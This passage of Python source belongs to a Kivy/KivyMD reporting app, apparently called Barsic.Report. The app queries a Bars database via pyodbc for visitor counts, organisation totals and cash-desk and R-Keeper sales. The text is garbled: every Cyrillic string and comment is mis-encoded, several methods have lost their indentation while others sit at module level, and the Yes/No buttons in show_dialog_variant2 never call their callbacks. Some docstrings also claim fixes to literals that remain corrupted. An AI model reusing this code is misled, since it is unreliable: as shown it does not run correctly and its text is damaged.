ะฝะฐ ะผะพะฑะธะปัะฝะพะผ ััััะพะนััะฒะต.'''
if keyboard in (1001, 27):
if self.nav_drawer.state == 'open':
self.nav_drawer.toggle_nav_drawer()
self.back_screen(event=keyboard)
elif keyboard in (282, 319):
pass
return True
def back_screen(self, event=None):
'''ะะตะฝะตะดะถะตั ัะบัะฐะฝะพะฒ. ะัะทัะฒะฐะตััั ะฟัะธ ะฝะฐะถะฐัะธะธ Back Key
ะธ ัะตะฒัะพะฝะฐ "ะะฐะทะฐะด" ะฒ ToolBar.'''
# ะะฐะถะฐัะฐ BackKey.
if event in (1001, 27):
if self.manager.current == 'base':
self.dialog_exit()
return
try:
self.manager.current = self.list_previous_screens.pop()
except:
self.manager.current = 'base'
self.screen.ids.action_bar.title = self.title
self.screen.ids.action_bar.left_action_items = \
[['menu', lambda x: self.nav_drawer._toggle()]]
    def show_plugins(self, *args):
        '''Show the list of plugins on screen.'''
        self.plugin.show_plugins()
    def show_about(self, *args):
        """Fill and open the About screen (version, license, developer links)."""
        self.nav_drawer.toggle_nav_drawer()
        # Markup text; the Cyrillic app name below appears mis-encoded
        # (mojibake) — left byte-for-byte as in the source.
        self.screen.ids.about.ids.label.text = \
            self.translation._(
                u'[size=20][b]ะะฐััะธะบ.ะััะตัั[/b][/size]\n\n'
                u'[b]Version:[/b] {version}\n'
                u'[b]License:[/b] Corporate\n\n'
                u'[size=20][b]Developer[/b][/size]\n\n'
                u'[ref=github.com/sendhello]'
                u'[color={link_color}]SendHello[/color][/ref]\n\n'
                u'[b]Source code:[/b] '
                u'[ref=github.com/sendhello/Barsic.Report]'
                u'[color={link_color}]GitHub[/color][/ref]').format(
                version=__version__,
                link_color=get_hex_from_color(self.theme_cls.primary_color)
            )
        self.manager.current = 'about'
        self.screen.ids.action_bar.left_action_items = \
            [['chevron-left', lambda x: self.back_screen(27)]]
    def show_reports(self, *args):
        """
        Switch to the REPORTS screen and preload its controls.

        :param args: unused event arguments from the caller.
        """
        self.nav_drawer.toggle_nav_drawer()
        self.manager.current = 'report'
        self.screen.ids.action_bar.left_action_items = \
            [['chevron-left', lambda x: self.back_screen(27)]]
        # Load parameters from the INI file (load_checkbox is defined
        # elsewhere in this module) and reset the report date to today.
        self.load_checkbox()
        self.set_date_from(datetime.now().date())
def show_license(self, *args):
"""
ะะตัะตั
ะพะด ะฝะฐ ัะบัะฐะฝ ะะะฆะะะะะฏ
:param args:
:return:
"""
self.screen.ids.license.ids.text_license.text = \
self.translation._('%s') % open(
os.path.join(self.directory, 'LICENSE'), encoding='utf-8').read()
self.nav_drawer._toggle()
self.manager.current = 'license'
self.screen.ids.action_bar.left_action_items = \
[['chevron-left', lambda x: self.back_screen(27)]]
self.screen.ids.action_bar.title = \
self.translation._('MIT LICENSE')
    def select_locale(self, *args):
        """
        Show a window listing the available UI locales so the user can pick one.

        :param args: unused event arguments from the caller.
        """
        def select_locale(name_locale):
            """
            Persist the chosen locale into the app config.

            :param name_locale: human-readable locale name from the list.
            """
            for locale in self.dict_language.keys():
                if name_locale == self.dict_language[locale]:
                    self.lang = locale
                    self.config.set('General', 'language', self.lang)
                    self.config.write()
        # Build {display name: ['locale', is_current]} for the list widget.
        dict_info_locales = {}
        for locale in self.dict_language.keys():
            dict_info_locales[self.dict_language[locale]] = \
                ['locale', locale == self.lang]
        # Create the selection window lazily, then reuse it on later calls.
        if not self.window_language:
            self.window_language = card(
                Lists(
                    dict_items=dict_info_locales,
                    events_callback=select_locale, flag='one_select_check'
                ),
                size=(.85, .55)
            )
        self.window_language.open()
    def dialog_exit(self):
        """Exit on double Back press: a second press within ~5 s quits the app."""
        def check_interval_press(interval):
            # exit_interval starts as False (== 0) and accumulates elapsed
            # seconds; after 5 s the window expires and the timer is removed.
            self.exit_interval += interval
            if self.exit_interval > 5:
                self.exit_interval = False
                Clock.unschedule(check_interval_press)
        # A truthy exit_interval means a first press happened recently.
        if self.exit_interval:
            sys.exit(0)
        Clock.schedule_interval(check_interval_press, 1)
        toast(self.translation._('Press Back to Exit'))
    def show_dialog(self, title, text, func=functions.func_pass, *args, **kwargs):
        """Modal info dialog with one close button; runs *func* after closing."""
        content = MDLabel(font_style='Body1',
                          theme_text_color='Secondary',
                          text=text,
                          size_hint_y=None,
                          valign='top')
        content.bind(texture_size=content.setter('size'))
        dialog = MDDialog(title=title,
                          content=content,
                          size_hint=(.8, None),
                          height=dp(200),
                          auto_dismiss=False)
        # Button caption is mis-encoded Cyrillic (presumably "Close") —
        # left byte-for-byte as in the source.
        dialog.add_action_button("ะะฐะบัััั", action=lambda *x: (dialog.dismiss(), func(*args, **kwargs)))
        dialog.open()
    def show_dialog_variant(self, title, text, func=functions.func_pass, *args, **kwargs):
        """Yes/No-style dialog: "OK" runs *func*, the other button only closes."""
        content = MDLabel(font_style='Body1',
                          theme_text_color='Secondary',
                          text=text,
                          size_hint_y=None,
                          valign='top')
        content.bind(texture_size=content.setter('size'))
        dialog = MDDialog(title=title,
                          content=content,
                          size_hint=(.8, None),
                          height=dp(200),
                          auto_dismiss=False)
        # Button captions are mis-encoded Cyrillic (presumably "OK" / "No").
        dialog.add_action_button("ะะ", action=lambda *x: (dialog.dismiss(), func(*args, **kwargs)))
        # NOTE(review): the trailing ``False`` is evaluated and discarded —
        # the second button only dismisses; nothing reaches any caller.
        dialog.add_action_button("ะะตั", action=lambda *x: (dialog.dismiss(), False))
        dialog.open()
def show_dialog_variant2(self, title, text, func_yes=functions.func_pass, func_no=functions.func_pass):
content = MDLabel(font_style='Body1',
theme_text_color='Secondary',
text=text,
size_hint_y=None,
valign='top')
content.bind(texture_size=content.setter('size'))
dialog = MDDialog(title=title,
content=content,
size_hint=(.8, None),
height=dp(200),
auto_dismiss=False)
dialog.add_action_button("ะะ", action=lambda *x: (dialog.dismiss(), func_yes))
dialog.add_action_button("ะะตั", action=lambda *x: (dialog.dismiss(), func_no))
dialog.open()
    def on_lang(self, instance, lang):
        # Kivy property observer: the `lang` StringProperty changed — switch
        # the translation catalogue accordingly.
        self.translation.switch_lang(lang)
    def get_time_picker_data(self, instance, time):
        """Time-picker callback: display the chosen time and remember it."""
        self.root.ids.time_picker_label.text = str(time)
        self.previous_time = time
    def show_time_picker(self):
        """Open the time picker, optionally pre-set to the previous choice."""
        self.time_dialog = MDTimePicker()
        self.time_dialog.bind(time=self.get_time_picker_data)
        if self.root.ids.time_picker_use_previous_time.active:
            try:
                self.time_dialog.set_time(self.previous_time)
            except AttributeError:
                # No previous_time stored yet — keep the picker's default.
                pass
        self.time_dialog.open()
    def set_date_from(self, date_obj):
        """Set the report start date; in single-date mode the end date follows."""
        self.previous_date_from = date_obj
        self.date_from = datetime.strptime(str(date_obj), '%Y-%m-%d')
        self.root.ids.report.ids.date_from.text = str(date_obj)
        # Keep the period valid: end date never precedes the start date.
        if self.date_to < self.date_from or self.root.ids.report.ids.date_switch.active:
            self.set_date_to(date_obj)
        # Log message is mis-encoded Cyrillic ("setting report period") —
        # left byte-for-byte as in the source.
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะฃััะฐะฝะพะฒะบะฐ ะฟะตัะธะพะดะฐ ะพััะตัะฐ ะฝะฐ {self.date_from} - {self.date_to}')
    def show_date_from(self):
        """Open the start-date picker, pre-seeded with the previous choice."""
        pd = self.previous_date_from
        try:
            MDDatePicker(self.set_date_from,
                         pd.year, pd.month, pd.day).open()
        except AttributeError:
            # previous_date_from not set yet — open the picker on today.
            MDDatePicker(self.set_date_from).open()
    def set_date_to(self, date_obj):
        """Set the report end date (stored as the exclusive next midnight)."""
        self.previous_date_to = date_obj
        self.date_to = datetime.strptime(str(date_obj), '%Y-%m-%d') + timedelta(1)
        self.root.ids.report.ids.date_to.text = str(date_obj)
        # Keep the period valid: start date never exceeds the end date.
        if self.date_to < self.date_from:
            self.set_date_from(date_obj)
        # Log message is mis-encoded Cyrillic ("setting report period") —
        # left byte-for-byte as in the source.
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะฃััะฐะฝะพะฒะบะฐ ะฟะตัะธะพะดะฐ ะพััะตัะฐ ะฝะฐ {self.date_from} - {self.date_to}')
    def show_date_to(self):
        """Open the end-date picker; disabled while in single-date mode."""
        if self.root.ids.report.ids.date_switch.active:
            # Single-date mode: end date is derived, picker is a no-op.
            pass
        else:
            pd = self.previous_date_to
            try:
                MDDatePicker(self.set_date_to,
                             pd.year, pd.month, pd.day).open()
            except AttributeError:
                # previous_date_to not set yet — open the picker on today.
                MDDatePicker(self.set_date_to).open()
def click_date_switch(self):
    """Toggle between single-day and period report modes, updating the UI."""
    ids = self.root.ids.report.ids
    single_day = ids.date_switch.active
    self.date_switch = single_day
    if single_day:
        ids.label_date.text = 'ะะฐัะฐ:'
        self.set_date_to(self.date_from.date() + timedelta(1))
        ids.date_to.theme_text_color = 'Secondary'
        # day-splitting makes no sense for a single day
        ids.split_by_days.active = False
        ids.split_by_days.disabled = True
        ids.split_by_days_text.theme_text_color = 'Secondary'
        self.change_checkbox('split_by_days', False)
        ids.finreport_google_text.disabled = False
        ids.finreport_google.disabled = False
    else:
        ids.label_date.text = 'ะะตัะธะพะด:'
        ids.date_to.theme_text_color = 'Primary'
        ids.split_by_days.disabled = False
        ids.split_by_days.active = True
        ids.split_by_days_text.theme_text_color = 'Primary'
        self.change_checkbox('split_by_days', True)
def count_clients(self, driver, server, database, uid, pwd):
    """Query the Bars DB for how many clients currently hold zone stock.

    Returns a list of rows (count, category_id, category_name,
    category_code). When the query yields nothing a placeholder row is
    appended; on connection/query errors the error is logged, shown in
    a dialog, and an error placeholder row is returned instead.

    Fix: restores the string literals 'ะะตั ะดะฐะฝะฝั‹ั…' that were corrupted
    (the letter "ั…" had turned into a line break); replaces the manual
    fetchone loop with fetchall.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะฟะพะปะฝะตะฝะธะต ััะฝะบัะธะธ "count_clients"')
    result = []
    try:
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฟััะบะฐ ัะพะตะดะธะฝะตะฝะธั ั {server}')
        cnxn = pyodbc.connect(
            f'DRIVER={driver};SERVER={server};DATABASE={database};UID={uid};PWD={pwd}')
        cursor = cnxn.cursor()
        cursor.execute("""
            SELECT
                [gr].[c1] as [c11],
                [gr].[StockCategory_Id] as [StockCategory_Id1],
                [c].[Name],
                [c].[NN]
            FROM
            (
                SELECT
                    [_].[CategoryId] as [StockCategory_Id],
                    Count(*) as [c1]
                FROM
                    [AccountStock] [_]
                    INNER JOIN [SuperAccount] [t1] ON [_].[SuperAccountId] = [t1].[SuperAccountId]
                WHERE
                    [_].[StockType] = 41 AND
                    [t1].[Type] = 0 AND
                    [_].[Amount] > 0 AND
                    NOT ([t1].[IsStuff] = 1)
                GROUP BY
                    [_].[CategoryId]
            ) [gr]
            INNER JOIN [Category] [c] ON [gr].[StockCategory_Id] = [c].[CategoryId]
        """)
        result.extend(cursor.fetchall())
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะ ะตะทัะปััะฐั ััะฝะบัะธะธ "count_clients": {result}')
        if not result:
            # no one in the zone: placeholder row so callers can index [-1]
            result.append(('ะัััะพ', 488, '', '0003'))
    except pyodbc.OperationalError as e:
        logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
        result.append(('ะะตั ะดะฐะฝะฝั‹ั…', 488, 'ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั', repr(e)))
        self.show_dialog(f'ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั ั {server}: {database}', repr(e))
    except pyodbc.ProgrammingError as e:
        logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
        result.append(('ะะตั ะดะฐะฝะฝั‹ั…', 488, 'ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั', repr(e)))
        self.show_dialog(f'ะะตะฒะพะทะผะพะถะฝะพ ะพัะบัััั {database}', repr(e))
    return result
def count_clients_print(self):
    """Refresh the "clients in zone" widgets on the main screen.

    Shows "<aquazone entries today> / <total clients today>" plus the
    name and count of the last category row returned by count_clients.
    Improvement: negative indexing (``in_zone[-1]``) instead of
    ``in_zone[len(in_zone) - 1]``.
    """
    in_zone = self.count_clients(
        driver=self.driver,
        server=self.server,
        database=self.database1,
        uid=self.user,
        pwd=self.pwd,
    )
    self.click_select_org()
    try:
        count_clients = int(self.itog_report(
            server=self.server,
            database=self.database1,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            org=self.org1[0],
            org_name=self.org1[1],
            date_from=datetime.now(),
            date_to=datetime.now() + timedelta(1),
            hide_zeroes='0',
            hide_internal='1',
        )['ะะบะฒะฐะทะพะฝะฐ'][0])
    except KeyError:
        # no aquazone sales in today's report
        count_clients = 0
    try:
        count_clients_allday = self.reportClientCountTotals(
            server=self.server,
            database=self.database1,
            driver=self.driver,
            user=self.user,
            pwd=self.pwd,
            org=self.org1[0],
            date_from=datetime.now(),
            date_to=datetime.now() + timedelta(1),
        )[0][1]
    except IndexError:
        # the stored procedure returned no rows
        count_clients_allday = 0
    self.screen.ids.base.ids.count_clients.text = str(count_clients) + ' / ' + str(count_clients_allday)
    # count_clients always returns at least one (possibly placeholder) row
    self.screen.ids.base.ids.name_zone.text = str(in_zone[-1][2])
    self.screen.ids.base.ids.count.text = str(in_zone[-1][0])
# -------------------------------ะะฝะพะฟะบะธ ะฒัะฒะพะดะฐ ัะฟะธัะบะฐ ะพัะณะฐะฝะธะทะฐัะธะน ะดะปั ะฒัะฑะพัะฐ----------------------------------------
# def select_org1(self):
# """
# ะัะฒะพะด ัะฟะธัะบะฐ ะพัะณะฐะฝะธะทะฐัะธะน
# :return:
# """
# org_list = self.list_organisation(
# server=self.server,
# database=self.database1,
# uid=self.user,
# pwd=self.pwd,
# driver=self.driver,
# )
# if org_list:
# bs = MDListBottomSheet()
# for org in org_list:
# bs.add_item(org[2], lambda x: self.click_select_org(org[0], org[2], self.database1), icon='nfc')
# bs.open()
#
# def select_org2(self):
# """
# ะัะฒะพะด ัะฟะธัะบะฐ ะพัะณะฐะฝะธะทะฐัะธะน
# :return:
# """
# org_list = self.list_organisation(
# server=self.server,
# database=self.database2,
# uid=self.user,
# pwd=self.pwd,
# driver=self.driver,
# )
# if org_list:
# bs = MDListBottomSheet()
# for org in org_list:
# bs.add_item(org[2], lambda x: self.click_select_org(org[0], org[2], self.database2), icon='nfc')
# bs.open()
#
# def click_select_org(self, id, name, database):
# """
# ะัะฑะพั ะพัะณะฐะฝะธะทะฐัะธะธ ะธะท ัะฟะธัะบะฐ ะธ ะทะฐะฟะธัั ะตะต ะฒ ะฟะตัะตะผะตะฝะฝัั
# :param id:
# :param name:
# :param database:
# :return:
# """
# if database == self.database1:
# self.org1 = (id, name)
# self.screen.ids.report.ids.org1.text = name
# elif database == self.database2:
# self.org2 = (id, name)
# self.screen.ids.report.ids.org2.text = name
# ---------- ะัะฑะพั ะฟะตัะฒะพะน ะพัะณะฐะฝะธะทะฐัะธะธ ะธะท ัะฟะธัะบะฐ ะพัะณะฐะฝะธะทะฐัะธะน (ะะฐะผะตะฝะฐ ะบะฝะพะฟะบะฐะผ ะฒัะฑะพัะฐ ะพัะณะฐะฝะธะทะฐัะธะน) --------------------
def click_select_org(self):
    """Pick the working organisations from both databases.

    ``org1`` is the organisation with id 36 and ``org3`` the one with
    id 7203673 from database1; ``org2`` is the first organisation from
    database2.

    Fix: ``list_organisation`` returns [] after a connection error, so
    ``org_list2[0]`` could raise an uncaught IndexError — empty results
    are now skipped, and the selection is only logged when both lists
    are non-empty.
    """
    org_list1 = self.list_organisation(
        server=self.server,
        database=self.database1,
        uid=self.user,
        pwd=self.pwd,
        driver=self.driver,
    )
    org_list2 = self.list_organisation(
        server=self.server,
        database=self.database2,
        uid=self.user,
        pwd=self.pwd,
        driver=self.driver,
    )
    for org in org_list1:
        if org[0] == 36:
            self.org1 = (org[0], org[2])
        elif org[0] == 7203673:
            self.org3 = (org[0], org[2])
    if org_list2:
        self.org2 = (org_list2[0][0], org_list2[0][2])
    if org_list1 and org_list2:
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะฑัะฐะฝั ะพัะณะฐะฝะธะทะฐัะธะธ {org_list1[0][2]} ะธ {org_list2[0][2]}')
def list_organisation(self, server, database, uid, pwd, driver):
    """Return all organisations registered in a Bars database.

    Organisations are SuperAccount rows with Type = 1; each result item
    is a row (tuple-like) of the organisation's attributes. Returns []
    when the connection or query fails; the error is logged and shown
    in a dialog.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะธัะบ ะพัะณะฐะฝะธะทะฐัะธะน...')
    result = []
    try:
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฟััะบะฐ ัะพะตะดะธะฝะตะฝะธั ั {server}')
        cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={uid};PWD={pwd}')
        cursor = cnxn.cursor()
        id_type = 1  # SuperAccount.Type used for organisations
        cursor.execute(
            f"""
            SELECT
                SuperAccountId, Type, Descr, CanRegister, CanPass, IsStuff, IsBlocked, BlockReason, DenyReturn,
                ClientCategoryId, DiscountCard, PersonalInfoId, Address, Inn, ExternalId, RegisterTime,LastTransactionTime,
                LegalEntityRelationTypeId, SellServicePointId, DepositServicePointId, AllowIgnoreStoredPledge, Email,
                Latitude, Longitude, Phone, WebSite, TNG_ProfileId
            FROM
                SuperAccount
            WHERE
                Type={id_type}
            """)
        result.extend(cursor.fetchall())
    except pyodbc.OperationalError as e:
        logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
        self.show_dialog(f'ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั ั {server}: {database}', repr(e))
    except pyodbc.ProgrammingError as e:
        logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
        self.show_dialog(f'ะะตะฒะพะทะผะพะถะฝะพ ะพัะบัััั {database}', repr(e))
    return result
@functions.to_googleshet
@functions.add_date
@functions.add_sum
@functions.convert_to_dict
def itog_report(
        self,
        server,
        database,
        driver,
        user,
        pwd,
        org,
        org_name,
        date_from,
        date_to,
        hide_zeroes='0',
        hide_internal='1',
):
    """Run the Bars totals stored procedure for one organisation.

    Executes ``sp_reportOrganizationTotals_v2`` for *org* over
    [date_from, date_to) and returns its rows, with two marker rows
    appended carrying the organisation name and id (picked up by the
    ``convert_to_dict`` decorator). The decorator chain converts the
    rows to a dict, adds totals/date and pushes to Google Sheets.

    :param hide_zeroes: '0'/'1' — hide zero rows in the report
    :param hide_internal: '0'/'1' — hide internal service points
    """
    cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
    date_from = date_from.strftime('%Y%m%d 00:00:00')
    date_to = date_to.strftime('%Y%m%d 00:00:00')
    cursor = cnxn.cursor()
    cursor.execute(
        f"exec sp_reportOrganizationTotals_v2 @sa={org},@from='{date_from}',@to='{date_to}',@hideZeroes={hide_zeroes},"
        f"@hideInternal={hide_internal}")
    report = list(cursor.fetchall())
    # marker rows: organisation name and id, consumed by convert_to_dict
    report.append((0, 0, 0, 0, org_name, 0, 'ะัะณะฐะฝะธะทะฐัะธั', 'ะัะณะฐะฝะธะทะฐัะธั'))
    report.append((0, 0, 0, 0, str(org), 0, 'ID ะพัะณะฐะฝะธะทะฐัะธะธ', 'ID ะพัะณะฐะฝะธะทะฐัะธะธ'))
    if len(report) > 1:
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะพะณะพะฒัะน ะพััะตั ััะพัะผะธัะพะฒะฐะฝ ID ะพัะณะฐะฝะธะทะฐัะธะธ = {org}, '
                     f'ะะตัะธะพะด: {date_from[:8]}-{date_to[:8]}, ะกะบััะฒะฐัั ะฝัะปะธ = {hide_zeroes}, .'
                     f'ะกะบััะฒะฐัั ะฒะฝัััะตะฝะฝะธะต ัะพัะบะธ ะพะฑัะปัะถะธะฒะฐะฝะธั: {hide_internal})')
    return report
def reportClientCountTotals(
        self,
        server,
        database,
        driver,
        user,
        pwd,
        org,
        date_from,
        date_to,
):
    """Run ``sp_reportClientCountTotals`` for *org* over [date_from, date_to).

    Returns the raw stored-procedure rows (may be empty).
    """
    cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
    date_from = date_from.strftime('%Y%m%d 00:00:00')
    date_to = date_to.strftime('%Y%m%d 00:00:00')
    cursor = cnxn.cursor()
    cursor.execute(
        f"exec sp_reportClientCountTotals @sa={org},@from='{date_from}',@to='{date_to}',@categoryId=0")
    report = list(cursor.fetchall())
    if len(report) > 1:
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะััะตั ะฟะพ ะบะพะปะธัะตััะฒั ะฟะพัะตัะธัะตะปะตะน ััะพัะผะธัะพะฒะฐะฝ '
                     f'ID ะพัะณะฐะฝะธะทะฐัะธะธ = {org}, ะะตัะธะพะด: {date_from[:8]}-{date_to[:8]}')
    return report
def client_count_totals_period(
        self,
        server,
        database,
        driver,
        user,
        pwd,
        org,
        org_name,
        date_from,
        date_to,
):
    """Collect daily client counts.

    For a single-day request the whole month containing *date_from* is
    returned (header flag 1); otherwise the requested period (flag 0).
    The result starts with ``(org_name, flag)`` and ends with a
    ``('ะัะพะณะพ', total)`` row.
    """
    single_day = date_from + timedelta(1) == date_to
    if single_day:
        # expand a one-day request to the whole month it belongs to
        day = datetime.strptime(date_from.strftime('%Y%m') + '01', '%Y%m%d')
    else:
        day = date_from
    counts = [(org_name, 1 if single_day else 0)]
    total = 0
    while day < date_to:
        rows = self.reportClientCountTotals(
            server=server,
            database=database,
            driver=driver,
            user=user,
            pwd=pwd,
            org=org,
            date_from=day,
            date_to=day + timedelta(1),
        )
        if rows:
            counts.append((rows[0][0], rows[0][1]))
            total += rows[0][1]
        else:
            # no visitors recorded that day
            counts.append((day, 0))
        day += timedelta(1)
    counts.append(('ะัะพะณะพ', total))
    return counts
def cash_report_request(
        self,
        server,
        database,
        driver,
        user,
        pwd,
        date_from,
        date_to,
):
    """Run ``sp_reportCashDeskMoney`` over [date_from, date_to).

    Returns the raw cash-desk money rows for the whole database (the
    procedure is not filtered by organisation).
    """
    cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
    date_from = date_from.strftime('%Y%m%d 00:00:00')
    date_to = date_to.strftime('%Y%m%d 00:00:00')
    cursor = cnxn.cursor()
    cursor.execute(
        f"exec sp_reportCashDeskMoney @from='{date_from}', @to='{date_to}'")
    report = list(cursor.fetchall())
    if len(report) > 1:
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกัะผะผะพะฒะพะน ะพััะตั ััะพัะผะธัะพะฒะฐะฝ, '
                     f'ะะตัะธะพะด: {date_from[:8]}-{date_to[:8]}')
    return report
def service_point_request(
        self,
        server,
        database,
        driver,
        user,
        pwd,
):
    """Return all service points (work places) from a Bars database.

    Each row is (ServicePointId, Name, SuperAccountId, Type, Code,
    IsInternal).

    Fix: restores the log message 'ะกะฟะธัะพะบ ัะฐะฑะพัะธั… ะผะตัั ััะพัะผะธัะพะฒะฐะฝ.'
    that was corrupted (the letter "ั…" had turned into a line break);
    replaces the manual fetchone loop with fetchall.
    """
    cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
    cursor = cnxn.cursor()
    cursor.execute(
        f"""
        SELECT
            ServicePointId, Name, SuperAccountId, Type, Code, IsInternal
        FROM
            ServicePoint
        """
    )
    report = list(cursor.fetchall())
    if len(report) > 1:
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะฟะธัะพะบ ัะฐะฑะพัะธั… ะผะตัั ััะพัะผะธัะพะฒะฐะฝ.')
    return report
def cashdesk_report(
        self,
        server,
        database,
        driver,
        user,
        pwd,
        date_from,
        date_to,
):
    """Assemble the cash-desk (money) report from raw DB rows.

    Groups ``cash_report_request`` rows by operation type (column 8),
    replaces the service-point id with its name, and appends per-group
    'ะัะพะณะพ' rows plus an overall 'ะัะพะณะพ ะฟะพ ะพััะตัั' row. Extra keys
    'ะะฐัะฐ' and 'ะัะณะฐะฝะธะทะฐัะธั' carry the period and the organisation.
    """
    cash_report = self.cash_report_request(
        server=server,
        database=database,
        driver=driver,
        user=user,
        pwd=pwd,
        date_from=date_from,
        date_to=date_to,
    )
    service_point = self.service_point_request(
        server=server,
        database=database,
        driver=driver,
        user=user,
        pwd=pwd,
    )
    # service point id -> (name, super_account, type, code, is_internal)
    points = {p[0]: (p[1], p[2], p[3], p[4], p[5]) for p in service_point}
    report = {}
    for line in cash_report:
        row = [points[line[0]][0]] + list(line[1:8])
        report.setdefault(line[8], []).append(row)
    all_sum = ['ะัะพะณะพ ะฟะพ ะพััะตัั'] + [Decimal(0.0)] * 7
    for group_rows in report.values():
        type_sum = ['ะัะพะณะพ'] + [Decimal(0.0)] * 7
        for row in group_rows:
            # columns 1..7 are the money columns; 0 is the name
            for i in range(1, 8):
                type_sum[i] += row[i]
                all_sum[i] += row[i]
        group_rows.append(type_sum)
    report['ะัะพะณะพ'] = [all_sum]
    report['ะะฐัะฐ'] = [[date_from, date_to]]
    if database == self.database1:
        report['ะัะณะฐะฝะธะทะฐัะธั'] = [[self.org1[1]]]
    elif database == self.database2:
        report['ะัะณะฐะฝะธะทะฐัะธั'] = [[self.org2[1]]]
    return report
def read_bitrix_base(self,
                     server,
                     database,
                     user,
                     pwd,
                     driver,
                     date_from,
                     date_to,
                     ):
    """Count online (Bitrix) sales paid within [date_from, date_to).

    Returns a tuple ``(number_of_orders, total_sum)``.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะงัะตะฝะธะต online-ะฟัะพะดะฐะถ...')
    date_from = date_from.strftime("%Y%m%d") + " 00:00:00"
    date_to = date_to.strftime("%Y%m%d") + " 00:00:00"
    cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
    cursor = cnxn.cursor()
    cursor.execute(
        f"""
        SELECT
            Id, OrderNumber, ProductId, ProductName, OrderDate, PayDate, Sum, Pay, Status, Client
        FROM
            Transactions
        WHERE
            (PayDate >= '{date_from}')and(PayDate < '{date_to}')
        """)
    orders = cursor.fetchall()
    # column 6 is the order sum
    total = sum(float(order[6]) for order in orders)
    return len(orders), total
def read_reportgroup(self, XML):
    """Parse the service-to-group mapping XML.

    Returns ``{group_name: [service_name, ...]}``, skipping the
    mandatory placeholder service each group carries.
    """
    with open(XML, encoding='utf-8') as fh:
        root = objectify.fromstring(fh.read())
    mapping = {}
    for org in root.UrFace:
        services = []
        for serv in org.Services.Service:
            name = serv.get('Name')
            if name != 'ะัััะฐั ะพะฑัะทะฐัะตะปัะฝะฐั ะบะฐัะตะณะพัะธั':
                services.append(name)
        mapping[org.get('Name')] = services
    return mapping
@staticmethod
def rk_report_request(
        server: str,
        database: str,
        driver: str,
        user: str,
        pwd: str,
        cash_id: int,
        date_from: datetime,
        date_to: datetime,
) -> List[Dict[str, Any]]:
    """Fetch R-Keeper sales for cash station *cash_id* over a period.

    Returns a list of ``{'station_id', 'open_time', 'paid_sum'}`` dicts.

    Bug fix: the SELECT returns columns in the order
    (OPENTIME, STATIONID, PAIDSUM), but the rows were mapped as
    ``station_id=row[0], open_time=row[1]`` — i.e. the two keys were
    swapped. They now match the actual column order; ``paid_sum`` was
    already correct.
    """
    cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
    date_from = date_from.strftime('%Y%m%d 00:00:00')
    date_to = date_to.strftime('%Y%m%d 00:00:00')
    cursor = cnxn.cursor()
    cursor.execute(
        f"""{''}
        SELECT OPENTIME, STATIONID, PAIDSUM FROM ORDERS
        WHERE STATIONID = {cash_id} AND OPENTIME > '{date_from}' AND OPENTIME < '{date_to}'
        """
    )
    report = [
        {'open_time': row[0], 'station_id': row[1], 'paid_sum': row[2]}
        for row in cursor.fetchall()
    ]
    logging.info(
        f"{__name__}: {str(datetime.now())[:-7]}: "
        f"ะััะตั ะฟะพ P-Keeper ััะพะผะธัะพะฒะฐะฝ, ะะตัะธะพะด: {date_from[:8]}-{date_to[:8]}"
    )
    return report
def find_new_service(self, service_dict, orgs_dict):
    """Queue report services missing from the XML mapping.

    Services present in *service_dict* (a totals report) but absent
    from *orgs_dict* (the XML mapping) are appended to
    ``self.new_service``; group names missing from ``self.orgs`` are
    appended there too.
    """
    known = {s for services in orgs_dict.values() for s in services}
    for serv in service_dict:
        if serv not in known and serv not in self.new_service:
            self.new_service.append(serv)
            known.add(serv)
    for group in orgs_dict:
        if group not in self.orgs:
            self.orgs.append(group)
def distibution_service(self):
    """Process the next unassigned service, or move on when done.

    Pops one service from ``self.new_service`` and opens the group
    chooser for it; once the queue is empty, hands control to
    ``agentservice``.
    """
    if not self.new_service:
        self.agentservice()
        return
    self.viev_orgs(self.new_service.pop())
def viev_orgs(self, service):
    """Show a bottom sheet asking which report group *service* belongs to."""
    sheet = MDListBottomSheet()
    sheet.add_item(
        f'ะ ะบะฐะบะพะน ะณััะฟะฟะต ะพััะตัะฐ ะพัะฝะพัะธััั ััะปัะณะฐ "{service}"? (1 ะธะท {len(self.new_service) + 1})',
        lambda x: x)
    for group in self.orgs:
        # pseudo-groups are not valid assignment targets
        if group not in ('ะะขะะะ', 'ะะตะฟะพะทะธั', 'ะะฐัะฐ'):
            sheet.add_item(group, lambda x: self.select_org(service, x.text), icon='nfc')
